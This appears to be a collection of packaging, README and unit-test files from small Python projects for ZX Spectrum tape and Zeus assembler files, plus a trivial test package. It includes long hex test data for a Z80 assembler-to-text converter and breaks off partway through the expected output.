"Intended Audience :: Education",
"Natural Language :: English",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Topic :: Software Development",
"Topic :: Utilities"
],
keywords=[
"sinclair", "zx", "spectrum", "tap", "development"
],
scripts=['bin/bas2tap', 'bin/tapextract', 'bin/tapify', 'bin/tapinfo', 'bin/tapsplit', 'bin/tap2bas'])
|
zxtaputils
|
/zxtaputils-1.0.0.tar.gz/zxtaputils-1.0.0/setup.py
|
setup.py
|
My library is a very good library; you can use it to do many things. Everyone is welcome to download and use it!
*italic*
**bold**
``this is my code``
|
zxtestlib
|
/zxtestlib-1.0.0.tar.gz/zxtestlib-1.0.0/README.rst
|
README.rst
|
import zxtestlib
zxtestlib.zxtest.run()
def tools():
print("this is a func for tools!!")
|
zxtestlib
|
/zxtestlib-1.0.0.tar.gz/zxtestlib-1.0.0/tool.py
|
tool.py
|
from setuptools import setup
def readme_file():
with open("README.rst", encoding="UTF-8") as f:
return f.read()
setup(name="zxtestlib", version="1.0.0", description="This is a test lib", packages=["zxtestlib"],
py_modules=["tool"], author="zx", author_email="870121209@qq.com", long_description=readme_file(),
url="https://gibhut.com/zhongxi/python_code")
|
zxtestlib
|
/zxtestlib-1.0.0.tar.gz/zxtestlib-1.0.0/setup.py
|
setup.py
|
=====================================
Tools to manipulate ZX Spectrum files
=====================================
.. image:: https://img.shields.io/travis/codeatcpp/zxtools/master.svg?style=flat
:target: https://travis-ci.org/codeatcpp/zxtools
.. image:: https://codecov.io/gh/codeatcpp/zxtools/branch/master/graph/badge.svg
:target: https://codecov.io/gh/codeatcpp/zxtools
.. image:: https://img.shields.io/github/release/codeatcpp/zxtools.svg?style=flat
:target: https://github.com/codeatcpp/zxtools/releases
.. image:: https://img.shields.io/pypi/v/zxtools.svg?style=flat
:target: https://pypi.python.org/pypi/zxtools
.. image:: http://img.shields.io/pypi/dm/zxtools.svg?style=flat
:target: https://pypi.python.org/pypi/zxtools
Here's a set of utils to manipulate files that were copied from a TR-DOS diskette or from a tape.
Originally the tools were written to simplify the following workflow:
1. Grab diskette image using `Hobeta <http://speccy.info/Hobeta>`_ tool.
2. Strip the file header and save the result to a new file.
3. Convert resulting `Zeus Z80 assembler <https://en.wikipedia.org/wiki/Zeus_Assembler>`_ file to the plain text format.
TODO: I plan to implement some more tools that I need in order to restore my old ZX Spectrum projects.
But you can use the existing ones however you need. They're very easy to use: download the package and run ``setup.py`` (or install via ``pip install zxtools``), then invoke the tools in the following way::
$ python3 -m zxtools.hobeta strip input.hobeta result.zeus
$ python3 -m zxtools.zeus2txt result.zeus listing.asm --include-code
.. image:: https://raw.githubusercontent.com/codeatcpp/zxtools/master/zeus2txt.jpg
NOTE: Python 3 is required to use this package. Python 2 is not supported, but you are welcome to add support for it.
To view the resulting files with syntax colorization you can use special `Visual Studio Code plugin <https://marketplace.visualstudio.com/items?itemName=jia3ep.zeus-z80-asm>`_:
.. image:: https://raw.githubusercontent.com/codeatcpp/vscode-language-z80-asm/master/vscode.png
:target: https://marketplace.visualstudio.com/items?itemName=jia3ep.zeus-z80-asm
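The modules can also be used programmatically. Below is a minimal sketch (not part of the original README) that reads a Hobeta header with ``zxtools.hobeta.parse_info``; the call and the header fields mirror the bundled test suite, and ``example.hobeta`` is a placeholder path::

    from zxtools import hobeta

    # Open the Hobeta file in binary mode and parse its 17-byte header.
    with open("example.hobeta", "rb") as hobeta_file:
        header, crc = hobeta.parse_info(hobeta_file)

    # Header fields defined by hobeta.HEADER_FMT (see test/test_hobeta.py).
    print("name:", header.filename, "start:", header.start, "length:", header.length)
    # Per the tests, crc is the checksum recomputed by parse_info; it should
    # match the stored header.check_sum for an intact file.
    print("checksum OK" if header.check_sum == crc else "checksum mismatch")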
|
zxtools
|
/zxtools-1.0.22.tar.gz/zxtools-1.0.22/README.rst
|
README.rst
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
import re
from os.path import join, dirname
from setuptools import setup, find_packages
with open(join(dirname(__file__), 'zxtools', '__init__.py'), 'r') as f:
version_info = re.match(r".*__version__ = '(.*?)'", f.read(), re.S).group(1)
with open('README.rst') as f:
long_readme = f.read()
dev_requires = [
'pytest>=2.8',
'coverage>=3.7.1',
]
setup(
name='zxtools',
version=version_info,
description='Tools to manipulate files from ZX Spectrum',
keywords='spectrum sinclair 48k z80 zeus zeus-asm',
long_description=long_readme,
author='Kirill V. Lyadvinsky',
author_email='mail@codeatcpp.com',
download_url='https://github.com/codeatcpp/zxtools',
url='http://www.codeatcpp.com',
license='BSD-3-Clause',
packages=find_packages(exclude=('test', 'docs')),
extras_require={
'test': dev_requires,
},
test_suite='test',
classifiers=[
'Development Status :: 4 - Beta',
'Operating System :: OS Independent',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development',
'Topic :: Utilities',
],
entry_points={
'console_scripts': [
'zeus2txt = zxtools.zeus2txt:main',
'hobeta = zxtools.hobeta:main',
],
},
)
|
zxtools
|
/zxtools-1.0.22.tar.gz/zxtools-1.0.22/setup.py
|
setup.py
|
#! /usr/bin/env python
# vim: set fileencoding=utf-8 :
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Kirill V. Lyadvinsky
# http://www.codeatcpp.com
#
# Licensed under the BSD 3-Clause license.
# See LICENSE file in the project root for full license information.
#
""" zeus2txt.py tests """
import io
import os
import tempfile
import unittest
from collections import namedtuple
import logging
from zxtools import zeus2txt
class TestZeus2Txt(unittest.TestCase):
def test_args_parser(self):
with self.assertRaises(SystemExit):
zeus2txt.parse_args(("-h", "-v"))
with self.assertRaises(SystemExit):
zeus2txt.parse_args(())
temp_in_file = tempfile.mkstemp()[1]
input_file = open(temp_in_file, "w")
input_file.close()
temp_out_file = tempfile.mkstemp()[1]
try:
args = zeus2txt.parse_args(("info", temp_in_file))
self.assertEqual(args.func, zeus2txt.show_info)
args.zeus_file.close()
args = zeus2txt.parse_args(("convert",
temp_in_file, temp_out_file))
self.assertEqual(args.func, zeus2txt.convert_file)
args.zeus_file.close()
args.output_file.close()
finally:
os.remove(temp_in_file)
os.remove(temp_out_file)
@staticmethod
def prepare_convert_args(test_data, include_code=False):
test_file = io.BytesIO(test_data)
temp_output_path = tempfile.mkstemp()[1]
temp_output_file = open(temp_output_path, "w")
args = namedtuple('Args', "zeus_file output_file include_code")
parsed_args = args(test_file, temp_output_file, include_code)
return parsed_args, temp_output_path, temp_output_file
def test_undefined_token(self):
logging.basicConfig(level=logging.DEBUG)
args, temp_output_path, temp_output_file = self.prepare_convert_args(
b"\x0A\x00\x0A\x06\xFF\x2C\x34\x32\x00\xFF\xFF")
try:
zeus2txt.convert_file(args)
temp_output_file.close()
temp_output_file = open(temp_output_path, "r")
lines = temp_output_file.read().splitlines()
self.assertEqual(lines, ["00010 ,42", ""])
finally:
temp_output_file.close()
os.remove(temp_output_path)
def test_no_eof(self):
args, temp_output_path, temp_output_file = self.prepare_convert_args(
b"\x0A\x00\x0A\x06\x82\x87\x2C\x34\x32\x00")
try:
zeus2txt.convert_file(args)
temp_output_file.close()
temp_output_file = open(temp_output_path, "r")
lines = temp_output_file.read().splitlines()
self.assertEqual(lines, ["00010 ADD BC,42", ])
finally:
temp_output_file.close()
os.remove(temp_output_path)
def test_include_code(self):
args, temp_output_path, temp_output_file = self.prepare_convert_args(
b"\x0A\x00\x0A\x06\x82\x87\x2C\x34\x32\x00", True)
try:
zeus2txt.convert_file(args)
temp_output_file.close()
temp_output_file = open(temp_output_path, "r")
lines = temp_output_file.read().splitlines()
self.assertEqual(lines, ["00010 ADD BC,42"
" ; 0x000A "
"0x0A 0x06 0x82 0x87 "
"0x2C 0x34 0x32 0x00 ", ])
finally:
temp_output_file.close()
os.remove(temp_output_path)
def test_convert(self):
args, temp_output_path, temp_output_file = self.prepare_convert_args(
self.test_data)
try:
zeus2txt.convert_file(args)
temp_output_file.close()
temp_output_file = open(temp_output_path, "rb")
lines = temp_output_file.read().splitlines()
expected_lines = self.test_output.split(b"\n")
self.assertEqual(lines, expected_lines)
finally:
temp_output_file.close()
os.remove(temp_output_path)
def setUp(self):
self.test_data = (
b"\x00\x00\x3B\x20\x4C\x4F\x41\x44\x45\x52\x20\x66\x6F\x72\x20\x46"
b"\x2E\x45\x44\x49\x54\x4F\x52\x00\x00\x00\x3B\x20\x4C\x2E\x4B\x2E"
b"\x50\x72\x6F\x64\x75\x63\x74\x69\x6F\x6E\x00\x0A\x00\x0A\x06\xBF"
b"\x35\x30\x30\x30\x30\x00\x14\x00\x0A\x06\x8A\x43\x4C\x53\x00\x1E"
b"\x00\x0A\x06\x8A\x53\x48\x52\x00\x28\x00\x0A\x06\x8A\x4E\x45\x57"
b"\x53\x48\x00\x32\x00\x0A\x06\xB3\x94\x2C\x4D\x53\x47\x31\x00\x3C"
b"\x00\x0A\x06\xB3\x87\x2C\x33\x39\x00\x46\x00\x0A\x06\x8A\x23\x32"
b"\x30\x33\x43\x00\x50\x00\x0A\x06\x8A\x53\x54\x41\x4E\x44\x00\x5A"
b"\x00\x0A\x06\xB3\xA5\x2C\x32\x32\x37\x38\x34\x00\x64\x00\x0A\x06"
b"\xB3\x94\x2C\x32\x32\x37\x38\x33\x00\x6E\x00\x0A\x06\xB3\x87\x2C"
b"\x35\x31\x31\x00\x78\x00\x0A\x06\xB3\x28\xA5\x29\x2C\x30\x00\x82"
b"\x00\x0A\x06\xB7\x00\x8C\x00\x0A\x06\xB0\x4C\x4F\x41\x44\x00\x3F"
b"\x9C\x45\x4E\x44\x0A\x03\xCC\x00\x40\x9C\x43\x4C\x53\x0A\x03\xB3"
b"\xA5\x2C\x31\x36\x33\x38\x34\x00\x4A\x9C\x0A\x06\xB3\x94\x2C\x31"
b"\x36\x33\x38\x35\x00\x54\x9C\x0A\x06\xB3\x87\x2C\x36\x31\x34\x33"
b"\x00\x5E\x9C\x0A\x06\xB3\x28\xA5\x29\x2C\x30\x00\x68\x9C\x0A\x06"
b"\xB7\x00\x72\x9C\x0A\x06\xB3\xA5\x2C\x32\x32\x35\x32\x38\x00\x7C"
b"\x9C\x0A\x06\xB3\x94\x2C\x32\x32\x35\x32\x39\x00\x86\x9C\x0A\x06"
b"\xB3\x87\x2C\x37\x36\x37\x00\x90\x9C\x0A\x06\xB3\x28\xA5\x29\x2C"
b"\x37\x00\x9A\x9C\x0A\x06\xB7\x00\xA4\x9C\x0A\x06\xE3\x80\x00\xAE"
b"\x9C\xC2\x28\x32\x35\x34\x29\x2C\x80\x3A\xB3\x80\x2C\x37\x00\xAF"
b"\x9C\x0A\x06\xB3\x28\x32\x33\x36\x32\x34\x29\x2C\x80\x00\xB8\x9C"
b"\x43\x48\x4F\x50\x45\x20\xB3\x80\x2C\x32\x00\xC2\x9C\x0A\x06\x8A"
b"\x23\x31\x36\x30\x31\x00\xCC\x9C\x0A\x06\xCC\x00\xD6\x9C\x53\x48"
b"\x52\x0A\x03\xB3\xA5\x2C\x31\x35\x36\x31\x36\x00\xE0\x9C\x0A\x06"
b"\xB3\x94\x2C\x33\x30\x30\x30\x30\x00\xEA\x9C\x0A\x06\xB3\x87\x2C"
b"\x37\x36\x38\x00\xF4\x9C\x0A\x06\xB7\x00\xFE\x9C\x0A\x06\xB3\xA5"
b"\x2C\x33\x30\x30\x30\x30\x00\x08\x9D\x0A\x06\xB3\x86\x2C\x39\x36"
b"\x00\x12\x9D\x53\x48\x32\x0A\x03\xC9\x87\x00\x1C\x9D\x0A\x06\xB3"
b"\x86\x2C\x34\x00\x26\x9D\x53\x48\x33\x0A\x03\xA9\xA5\x00\x30\x9D"
b"\x0A\x06\x9C\x53\x48\x33\x00\x3A\x9D\x0A\x06\xB3\x86\x2C\x34\x00"
b"\x44\x9D\x53\x48\x34\x0A\x03\xB3\x80\x2C\x28\xA5\x29\x00\x4E\x9D"
b"\x0A\x06\xD2\x00\x58\x9D\x0A\x06\xBE\x28\xA5\x29\x00\x62\x9D\x0A"
b"\x06\xB3\x28\xA5\x29\x2C\x80\x00\x6C\x9D\x0A\x06\xA9\xA5\x00\x76"
b"\x9D\x0A\x06\x9C\x53\x48\x34\x00\x80\x9D\x0A\x06\xC8\x87\x00\x8A"
b"\x9D\x0A\x06\x9C\x53\x48\x32\x00\x94\x9D\x0A\x06\xCC\x00\x9E\x9D"
b"\x53\x54\x41\x4E\x44\x20\xB3\xA5\x2C\x31\x35\x36\x31\x36\x00\xA8"
b"\x9D\x0A\x06\x95\xA3\x00\xB2\x9D\x0A\x06\xB3\x28\x32\x33\x36\x30"
b"\x36\x29\x2C\xA5\x00\xBC\x9D\x0A\x06\xCC\x00\xC6\x9D\x4E\x45\x57"
b"\x53\x48\x20\xB3\xA5\x2C\x41\x44\x52\x53\x48\x00\xD0\x9D\x0A\x06"
b"\x95\xA3\x00\xDA\x9D\x0A\x06\xB3\x28\x32\x33\x36\x30\x36\x29\x2C"
b"\xA5\x00\xE4\x9D\x0A\x06\xCC\x00\xEE\x9D\x46\x46\x49\x4C\x45\x20"
b"\xB3\x80\x2C\x28\x32\x30\x37\x30\x38\x29\x00\xF8\x9D\x0A\x06\x8C"
b"\x30\x00\x02\x9E\x0A\x06\xB1\xE4\x2C\x4E\x46\x49\x4C\x45\x00\x0C"
b"\x9E\x0A\x06\xB3\x86\x2C\x80\x00\x16\x9E\x0A\x06\xB3\x94\x2C\x31"
b"\x38\x34\x33\x32\x00\x20\x9E\x46\x46\x32\x0A\x03\xB3\xA5\x2C\x46"
b"\x4E\x41\x4D\x45\x00\x2A\x9E\x0A\x06\xB3\x28\x50\x44\x45\x29\x2C"
b"\x94\x00\x34\x9E\x0A\x06\xB3\x28\x50\x42\x43\x29\x2C\x87\x00\x3E"
b"\x9E\x0A\x06\xB3\x86\x2C\x38\x00\x48\x9E\x46\x46\x33\x0A\x03\xB3"
b"\x80\x2C\x28\x94\x29\x00\x52\x9E\x0A\x06\x8C\x28\xA5\x29\x00\x5C"
b"\x9E\x0A\x06\xB1\xBD\x2C\x4E\x45\x58\x54\x46\x00\x66\x9E\x0A\x06"
b"\xA9\x94\x00\x70\x9E\x0A\x06\xA9\xA5\x00\x7A\x9E\x0A\x06\x9C\x46"
b"\x46\x33\x00\x84\x9E\x0A\x06\xB3\x80\x2C\x28\x94\x29\x00\x8E\x9E"
b"\x0A\x06\x8C\x36\x39\x00\x98\x9E\x0A\x06\xB1\xBD\x2C\x4E\x45\x58"
b"\x54\x46\x00\xA2\x9E\x0A\x06\xB3\xA5\x2C\x36\x00\xAC\x9E\x0A\x06"
b"\x82\xA5\x2C\x94\x00\xB6\x9E\x0A\x06\xB3\x80\x2C\x28\xA5\x29\x00"
b"\xC0\x9E\x0A\x06\xB3\x28\x53\x45\x43\x29\x2C\x80\x00\xCA\x9E\x0A"
b"\x06\xA9\xA5\x00\xD4\x9E\x0A\x06\xB3\x80\x2C\x28\xA5\x29\x00\xDE"
b"\x9E\x0A\x06\xB3\x28\x54\x52\x43\x29\x2C\x80\x00\xE8\x9E\x0A\x06"
b"\xB0\x4C\x4F\x41\x32\x00\xF2\x9E\x4E\x45\x58\x54\x46\x20\xB3\x94"
b"\x2C\x28\x50\x44\x45\x29\x00\xFC\x9E\x0A\x06\xB3\xA5\x2C\x31\x36"
b"\x00\x06\x9F\x0A\x06\x82\xA5\x2C\x94\x00\x10\x9F\x0A\x06\xA1\x94"
b"\x2C\xA5\x00\x1A\x9F\x0A\x06\xB3\x87\x2C\x28\x50\x42\x43\x29\x00"
b"\x24\x9F\x0A\x06\x9C\x46\x46\x32\x00\x2E\x9F\x4E\x46\x49\x4C\x45"
b"\x20\x8A\x4E\x45\x57\x53\x48\x00\x38\x9F\x0A\x06\xB3\x94\x2C\x4D"
b"\x53\x47\x32\x00\x42\x9F\x0A\x06\xB3\x87\x2C\x4D\x53\x47\x33\x2D"
b"\x4D\x53\x47\x32\x00\x4C\x9F\x0A\x06\x8A\x23\x32\x30\x33\x43\x00"
b"\x4D\x9F\x0A\x06\x8A\x42\x45\x45\x50\x00\x4E\x9F\x0A\x06\xB3\x94"
b"\x2C\x4D\x53\x47\x33\x00\x4F\x9F\x0A\x06\xB3\x87\x2C\x54\x52\x43"
b"\x2D\x4D\x53\x47\x33\x00\x50\x9F\x0A\x06\x8A\x23\x32\x30\x33\x43"
b"\x00\x60\x9F\x8A\x50\x41\x55\x53\x3A\x8A\x53\x54\x41\x4E\x44\x00"
b"\x6A\x9F\x0A\x06\xB0\x4C\x4F\x41\x44\x00\x74\x9F\x50\x41\x55\x53"
b"\x0A\x02\xE3\x80\x00\x7E\x9F\x0A\x06\xB3\x28\x32\x33\x35\x36\x30"
b"\x29\x2C\x80\x00\x88\x9F\x50\x41\x32\x0A\x03\xB3\x80\x2C\x28\x32"
b"\x33\x35\x36\x30\x29\x00\x92\x9F\x0A\x06\x8C\x30\x00\x9C\x9F\x0A"
b"\x06\xCC\x20\xBD\x00\xA6\x9F\x0A\x06\xB1\x50\x41\x32\x00\xB0\x9F"
b"\x42\x45\x45\x50\x0A\x02\xB3\x94\x2C\x23\x30\x31\x30\x35\x00\xBA"
b"\x9F\x0A\x06\xB3\xA5\x2C\x23\x30\x36\x36\x36\x00\xC4\x9F\x0A\x06"
b"\x8A\x23\x30\x33\x42\x35\x00\xCE\x9F\x0A\x06\xCC\x00\xD8\x9F\x4C"
b"\x4F\x41\x44\x0A\x02\xB3\xA5\x2C\x32\x32\x35\x36\x30\x00\xE2\x9F"
b"\x0A\x06\xB3\x94\x2C\x32\x32\x35\x36\x31\x00\xEC\x9F\x0A\x06\xB3"
b"\x87\x2C\x37\x33\x36\x00\xF6\x9F\x0A\x06\xB3\x28\xA5\x29\x2C\x30"
b"\x00\x00\xA0\x0A\x06\xB7\x00\x0A\xA0\x0A\x06\xB3\x87\x2C\x23\x30"
b"\x39\x30\x35\x00\x14\xA0\x0A\x06\xB3\x94\x2C\x30\x00\x1E\xA0\x0A"
b"\x06\xB3\xA5\x2C\x31\x38\x34\x33\x32\x00\x28\xA0\x0A\x06\x8A\x31"
b"\x35\x36\x33\x35\x00\x32\xA0\x0A\x06\xB0\x46\x46\x49\x4C\x45\x00"
b"\x3C\xA0\x4C\x4F\x41\x32\x0A\x02\xB3\x80\x2C\x28\x53\x45\x43\x29"
b"\x00\x46\xA0\x0A\x06\xB3\x9D\x2C\x80\x00\x50\xA0\x0A\x06\xB3\x80"
b"\x2C\x28\x54\x52\x43\x29\x00\x5A\xA0\x0A\x06\xB3\x92\x2C\x80\x00"
b"\x64\xA0\x0A\x06\xB3\x87\x2C\x23\x32\x36\x30\x35\x00\x6E\xA0\x0A"
b"\x06\xB3\xA5\x2C\x33\x30\x30\x30\x30\x00\x78\xA0\x0A\x06\x8A\x31"
b"\x35\x36\x33\x35\x00\x82\xA0\x0A\x06\xB0\x33\x31\x36\x39\x33\x00"
b"\x60\xEA\x41\x44\x52\x53\x48\x20\xA0\x33\x30\x30\x30\x30\x00\x6A"
b"\xEA\x4D\x53\x47\x31\x0A\x02\x96\x32\x32\x2C\x30\x2C\x30\x2C\x31"
b"\x37\x2C\x30\x00\x74\xEA\x0A\x06\x96\x31\x36\x2C\x37\x00\x7E\xEA"
b"\x97\x22\x46\x4F\x4E\x54\x20\x45\x44\x49\x54\x4F\x52\x20\x62\x79"
b"\x20\x4C\x79\x61\x22\x00\x88\xEA\x97\x22\x64\x76\x69\x6E\x73\x6B"
b"\x79\x20\x4B\x69\x72\x69\x6C\x6C\x22\x00\x92\xEA\x46\x4E\x41\x4D"
b"\x45\x20\x97\x22\x65\x64\x69\x74\x6F\x72\x0A\x02\x22\x00\x9C\xEA"
b"\x50\x44\x45\x0A\x03\x99\x30\x00\xA6\xEA\x50\x42\x43\x0A\x03\x99"
b"\x30\x00\xB0\xEA\x4D\x53\x47\x32\x0A\x02\x96\x32\x32\x2C\x35\x2C"
b"\x30\x2C\x31\x37\x2C\x30\x00\xBA\xEA\x96\x31\x36\x2C\x37\x2C\x31"
b"\x39\x2C\x31\x00\xC4\xEA\x97\x22\x46\x69\x6C\x65\x20\x27\x65\x64"
b"\x69\x74\x6F\x72\x0A\x02\x3C\x9D\x3E\x27\x22\x00\xCE\xEA\x97\x22"
b"\x20\x6E\x6F\x74\x20\x66\x6F\x75\x6E\x64\x22\x00\xD8\xEA\x4D\x53"
b"\x47\x33\x0A\x02\x96\x32\x32\x2C\x36\x2C\x30\x2C\x31\x37\x2C\x30"
b"\x00\xDD\xEA\x0A\x06\x96\x31\x36\x2C\x37\x2C\x31\x39\x2C\x30\x00"
b"\xE2\xEA\x97\x22\x50\x52\x45\x53\x53\x20\x41\x4E\x59\x20\x4B\x45"
b"\x59\x20\x46\x4F\x52\x20\x22\x00\xEC\xEA\x97\x22\x52\x45\x4C\x4F"
b"\x41\x44\x20\x46\x49\x4C\x45\x22\x00\x00\xEB\x54\x52\x43\x0A\x03"
b"\x96\x30\x00\x0A\xEB\x53\x45\x43\x0A\x03\x96\x30\x00\x14\xEB\x45"
b"\x4E\x44\x32\x0A\x02\xBB\x00\xFF\xFF"
)
self.test_output = (
b"\x30\x30\x30\x30\x30\x20\x3B\x20\x4C\x4F\x41\x44\x45\x52\x20\x66"
b"\x6F\x72\x20\x46\x2E\x45\x44\x49\x54\x4F\x52\x0A\x30\x30\x30\x30"
b"\x30\x20\x3B\x20\x4C\x2E\x4B\x2E\x50\x72\x6F\x64\x75\x63\x74\x69"
b"\x6F\x6E\x0A\x30\x30\x30\x31\x30\x20\x20\x20\x20\x20\x20\x20\x4F"
b"\x52\x47\x20\x35\x30\x30\x30\x30\x0A\x30\x30\x30\x32\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x43\x41\x4C\x4C\x20\x43\x4C\x53\x0A\x30\x30"
b"\x30\x33\x30\x20\x20\x20\x20\x20\x20\x20\x43\x41\x4C\x4C\x20\x53"
b"\x48\x52\x0A\x30\x30\x30\x34\x30\x20\x20\x20\x20\x20\x20\x20\x43"
b"\x41\x4C\x4C\x20\x4E\x45\x57\x53\x48\x0A\x30\x30\x30\x35\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x4D\x53\x47\x31"
b"\x0A\x30\x30\x30\x36\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20"
b"\x42\x43\x2C\x33\x39\x0A\x30\x30\x30\x37\x30\x20\x20\x20\x20\x20"
b"\x20\x20\x43\x41\x4C\x4C\x20\x23\x32\x30\x33\x43\x0A\x30\x30\x30"
b"\x38\x30\x20\x20\x20\x20\x20\x20\x20\x43\x41\x4C\x4C\x20\x53\x54"
b"\x41\x4E\x44\x0A\x30\x30\x30\x39\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x4C\x44\x20\x48\x4C\x2C\x32\x32\x37\x38\x34\x0A\x30\x30\x31\x30"
b"\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x32\x32"
b"\x37\x38\x33\x0A\x30\x30\x31\x31\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x4C\x44\x20\x42\x43\x2C\x35\x31\x31\x0A\x30\x30\x31\x32\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28\x48\x4C\x29\x2C\x30\x0A"
b"\x30\x30\x31\x33\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x49\x52"
b"\x0A\x30\x30\x31\x34\x30\x20\x20\x20\x20\x20\x20\x20\x4A\x50\x20"
b"\x4C\x4F\x41\x44\x0A\x33\x39\x39\x39\x39\x20\x45\x4E\x44\x20\x20"
b"\x20\x52\x45\x54\x0A\x34\x30\x30\x30\x30\x20\x43\x4C\x53\x20\x20"
b"\x20\x4C\x44\x20\x48\x4C\x2C\x31\x36\x33\x38\x34\x0A\x34\x30\x30"
b"\x31\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x31"
b"\x36\x33\x38\x35\x0A\x34\x30\x30\x32\x30\x20\x20\x20\x20\x20\x20"
b"\x20\x4C\x44\x20\x42\x43\x2C\x36\x31\x34\x33\x0A\x34\x30\x30\x33"
b"\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28\x48\x4C\x29\x2C"
b"\x30\x0A\x34\x30\x30\x34\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44"
b"\x49\x52\x0A\x34\x30\x30\x35\x30\x20\x20\x20\x20\x20\x20\x20\x4C"
b"\x44\x20\x48\x4C\x2C\x32\x32\x35\x32\x38\x0A\x34\x30\x30\x36\x30"
b"\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x44\x45\x2C\x32\x32\x35"
b"\x32\x39\x0A\x34\x30\x30\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C"
b"\x44\x20\x42\x43\x2C\x37\x36\x37\x0A\x34\x30\x30\x38\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x4C\x44\x20\x28\x48\x4C\x29\x2C\x37\x0A\x34"
b"\x30\x30\x39\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x49\x52\x0A"
b"\x34\x30\x31\x30\x30\x20\x20\x20\x20\x20\x20\x20\x58\x4F\x52\x20"
b"\x41\x0A\x34\x30\x31\x31\x30\x20\x4F\x55\x54\x20\x28\x32\x35\x34"
b"\x29\x2C\x41\x3A\x4C\x44\x20\x41\x2C\x37\x0A\x34\x30\x31\x31\x31"
b"\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28\x32\x33\x36\x32\x34"
b"\x29\x2C\x41\x0A\x34\x30\x31\x32\x30\x20\x43\x48\x4F\x50\x45\x20"
b"\x4C\x44\x20\x41\x2C\x32\x0A\x34\x30\x31\x33\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x43\x41\x4C\x4C\x20\x23\x31\x36\x30\x31\x0A\x34\x30"
b"\x31\x34\x30\x20\x20\x20\x20\x20\x20\x20\x52\x45\x54\x0A\x34\x30"
b"\x31\x35\x30\x20\x53\x48\x52\x20\x20\x20\x4C\x44\x20\x48\x4C\x2C"
b"\x31\x35\x36\x31\x36\x0A\x34\x30\x31\x36\x30\x20\x20\x20\x20\x20"
b"\x20\x20\x4C\x44\x20\x44\x45\x2C\x33\x30\x30\x30\x30\x0A\x34\x30"
b"\x31\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42\x43\x2C"
b"\x37\x36\x38\x0A\x34\x30\x31\x38\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x4C\x44\x49\x52\x0A\x34\x30\x31\x39\x30\x20\x20\x20\x20\x20\x20"
b"\x20\x4C\x44\x20\x48\x4C\x2C\x33\x30\x30\x30\x30\x0A\x34\x30\x32"
b"\x30\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42\x2C\x39\x36"
b"\x0A\x34\x30\x32\x31\x30\x20\x53\x48\x32\x20\x20\x20\x50\x55\x53"
b"\x48\x20\x42\x43\x0A\x34\x30\x32\x32\x30\x20\x20\x20\x20\x20\x20"
b"\x20\x4C\x44\x20\x42\x2C\x34\x0A\x34\x30\x32\x33\x30\x20\x53\x48"
b"\x33\x20\x20\x20\x49\x4E\x43\x20\x48\x4C\x0A\x34\x30\x32\x34\x30"
b"\x20\x20\x20\x20\x20\x20\x20\x44\x4A\x4E\x5A\x20\x53\x48\x33\x0A"
b"\x34\x30\x32\x35\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x42"
b"\x2C\x34\x0A\x34\x30\x32\x36\x30\x20\x53\x48\x34\x20\x20\x20\x4C"
b"\x44\x20\x41\x2C\x28\x48\x4C\x29\x0A\x34\x30\x32\x37\x30\x20\x20"
b"\x20\x20\x20\x20\x20\x52\x4C\x43\x41\x0A\x34\x30\x32\x38\x30\x20"
b"\x20\x20\x20\x20\x20\x20\x4F\x52\x20\x28\x48\x4C\x29\x0A\x34\x30"
b"\x32\x39\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28\x48\x4C"
b"\x29\x2C\x41\x0A\x34\x30\x33\x30\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x49\x4E\x43\x20\x48\x4C\x0A\x34\x30\x33\x31\x30\x20\x20\x20\x20"
b"\x20\x20\x20\x44\x4A\x4E\x5A\x20\x53\x48\x34\x0A\x34\x30\x33\x32"
b"\x30\x20\x20\x20\x20\x20\x20\x20\x50\x4F\x50\x20\x42\x43\x0A\x34"
b"\x30\x33\x33\x30\x20\x20\x20\x20\x20\x20\x20\x44\x4A\x4E\x5A\x20"
b"\x53\x48\x32\x0A\x34\x30\x33\x34\x30\x20\x20\x20\x20\x20\x20\x20"
b"\x52\x45\x54\x0A\x34\x30\x33\x35\x30\x20\x53\x54\x41\x4E\x44\x20"
b"\x4C\x44\x20\x48\x4C\x2C\x31\x35\x36\x31\x36\x0A\x34\x30\x33\x36"
b"\x30\x20\x20\x20\x20\x20\x20\x20\x44\x45\x43\x20\x48\x0A\x34\x30"
b"\x33\x37\x30\x20\x20\x20\x20\x20\x20\x20\x4C\x44\x20\x28\x32\x33"
b"\x36\x30\x36\x29\x2C\x48\x4C\x0A\x34\x30\x33\x38\x30\x20\x20\x20"
b"\x20\x20\x20\x20\x52\x45\x54\x0A\x34\x30\x33\x39\x30\x20\x4E\x45"
b"\x57\x53\x48\x20\x4C\x44\x20\x48\x4C\x2C\x41\x44\x52\x53\x48\x0A"
